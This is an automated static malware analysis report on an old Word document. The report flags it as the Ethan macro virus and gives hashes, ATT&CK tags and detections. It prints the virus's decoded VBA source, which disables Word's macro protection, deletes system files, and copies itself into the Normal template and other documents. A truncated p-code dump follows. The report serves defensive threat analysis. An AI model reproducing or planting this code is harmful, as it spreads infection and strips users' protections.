Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d34eb0ef33e05ff6…

MALICIOUS

Office (OLE)

Size: 35.0 KB
Created: 2000-03-22 09:36:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 7af9fe272ce09188050303bb3fb21e3c
SHA-1: 23650cff3c676cbfcb34c5148c1c40e9e4049050
SHA-256: d34eb0ef33e05ff6e744c26f452452485ba467dc926599063092b19e45aa3014
Risk Score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV, specifically as Doc.Trojan.Ethan-20. It contains VBA macros that attempt to write a file to disk and potentially download a second-stage payload. The macro code attempts to save itself to 'c:\_____.___' and also attempts to delete 'c:\class.sys' and 'c:\Brigl.sys'. The presence of VBA macros indicates a likely initial access vector via spearphishing attachment.

Heuristics (2)

  • ClamAV: Doc.Trojan.Ethan-20 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Ethan-20
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7948 bytes
SHA-256: 75cd96ab05b381ecdb8f99980e60254b1128d9b417845a6e246b9e681392b561
Detection: ClamAV: Doc.Trojan.Ethan-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next

Dim KillName$
KillName$ = "C:\class.sys"
If Dir(KillName) <> "" Then Kill KillName
If Dir("c:\Brigl.sys") <> "" Then Kill "c:\class.sys"

s = ActiveDocument.Saved
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With

Randomize
If Dir("c:\_____.___", 6) = "" Then
    Open "c:\_____.___" For Output As #1
    For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
    Print #1, a
    Next i
    Close #1
    SetAttr "c:\_____.___", 6
End If

If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
    Set t = NormalTemplate.VBProject.VBComponents.Item(1)
ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
    Set t = ActiveDocument.VBProject.VBComponents.Item(1)
Else
    t = ""
End If

If t <> "" Then
    Open "c:\_____.___" For Input As #1
    If LOF(1) = 0 Then GoTo q
    i = 1
    Do While Not EOF(1)
        Line Input #1, a
        t.CodeModule.InsertLines i, a
        i = i + 1
    Loop
q:
Close #1
If Rnd < 0.3 Then With Dialogs(wdDialogFileSummaryInfo): .Title = "Ethan Frome": .Author = "EW/LN/CB": .Keywords = "Ethan": .Execute: End With
If Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
End Sub
Private Sub CommandButton1_Click()
On Error Resume Next
If MsgBox("Send form to Personnel?", vbOKCancel, Timesheet) = vbOK Then
    MsgBox "Please remember to type ""Personnel UK"" in the to field of the mail message which will appear next"
    SendForm
ActiveDocument.Close (wdDoNotSaveChanges)
End If
End Sub

Private Sub CommandButton2_Click()
SaveDoc
End Sub

Private Sub Document_New()

End Sub

' Processing file: /opt/analyzer/scan_staging/41b218edc16c4204ae35ac53f1a4bc32.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4439 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' Line #3:
' 	Dim 
' 	VarDefn KillName
' Line #4:
' 	LitStr 0x000C "C:\class.sys"
' 	St KillName$ 
' Line #5:
' 	Ld KillName 
' 	ArgsLd Dir 0x0001 
' 	LitStr 0x0000 ""
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	Ld KillName 
' 	ArgsCall Kill 0x0001 
' 	EndIf 
' Line #6:
' 	LitStr 0x000C "c:\Brigl.sys"
' 	ArgsLd Dir 0x0001 
' 	LitStr 0x0000 ""
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x000C "c:\class.sys"
' 	ArgsCall Kill 0x0001 
' 	EndIf 
' Line #7:
' Line #8:
' 	Ld ActiveDocument 
' 	MemLd Saved 
' 	St s 
' Line #9:
' 	LitDI2 0x0001 
' 	UMi 
' 	Not 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #10:
' 	StartWithExpr 
' 	Ld Options 
' 	With 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith ConfirmConversions 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith VirusProtection 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith SaveNormalPrompt 
' 	BoS 0x0000 
' 	EndWith 
' Line #11:
' Line #12:
' 	ArgsCall Read 0x0000 
' Line #13:
' 	LitStr 0x000C "c:\_____.___"
' 	LitDI2 0x0006 
' 	ArgsLd Dir 0x0002 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #14:
' 	LitStr 0x000C "c:\_____.___"
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #15:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	For 
' Line #16:
' 	Ld i 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBP
... (truncated)